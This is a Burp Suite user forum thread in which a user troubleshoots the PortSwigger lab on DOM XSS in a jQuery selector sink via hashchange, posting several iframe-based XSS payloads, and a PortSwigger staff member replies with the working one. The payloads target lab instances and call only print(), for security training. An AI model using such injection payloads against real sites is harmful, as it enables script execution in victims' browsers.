The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum


No solution seems to work on this lab

Geoffrey | Last updated: Jul 03, 2024 01:32PM UTC

Lab: DOM XSS in jQuery selector sink using a hashchange event

I have tried:

<iframe src="https://0a51000e03217e2682062f3600220028.web-security-academy.net#" onload="this.src+='<img src=x onerror=print()>'">

<iframe src="https://0a51000e03217e2682062f3600220028.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>

<iframe src="https://0a51000e03217e2682062f3600220028.web-security-academy.net#" onload="this.src+='<img src=x onerror=print(1)>'">

<iframe src="https://0a51000e03217e2682062f3600220028.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print(1)>'"></iframe>

I've tried both with a slash and without a slash between .net and #. Just to see, I tried other variations as well. I have tried on Edge, embedded, Firefox, and Chrome. It works when I go to view exploit, but the lab does not get solved when I deliver it.

Ben, PortSwigger Agent | Last updated: Jul 03, 2024 04:37PM UTC

Hi Geoffrey,

I have just run through this lab, using the Firefox browser, and the written solution solves the lab so this does appear to be working as expected. I was able to solve the lab by delivering the following exploit in the Exploit Server:

<iframe src="https://0ac80082035514098298299200bf00b8.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
